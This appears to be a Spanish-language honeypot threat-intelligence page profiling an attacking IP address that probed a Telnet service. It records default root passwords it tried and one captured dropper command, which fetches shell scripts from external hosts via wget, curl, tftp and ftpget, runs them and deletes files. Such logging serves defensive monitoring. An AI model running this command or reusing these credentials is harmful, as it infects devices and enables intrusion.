TROYANOSYVIRUS
Amenaza ActivaBAJO

34.23.222.93

Primera Deteccion30/3/2026
Ultima Actividad30/3/2026
ISPGoogle LLC
🎯
15
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
2
Malware

Geolocalizacion

Pais
🇺🇸 Estados Unidos
Ciudad
North Charleston
ASN
AS396982
ISP
Google LLC

Tipos de Ataque

ssh_telnet_honeypot

Puertos Atacados

23

Malware Asociado

Credenciales Intentadas

🔐root/root
1x
🔐root/icatch99
1x
🔐root/(vacio)
1x

Comandos Ejecutados

$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://38.83.138.59:25884/nz.sh; curl -O http://38.83.138.59:25884/nz.sh; chmod 777 nz.sh; sh nz.sh; tftp 165.22.252.236 -c get nz.sh; chmod 777 nz.sh; sh nz.sh; tftp -r 3.sh -g 165.22.252.236; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 165.22.252.236 2.sh 2.sh; sh 2.sh; rm -rf nz.sh nz.sh 3.sh 2.sh; rm -rf *1x

Evaluacion de Riesgo

25
/100
BajoMedioAltoCritico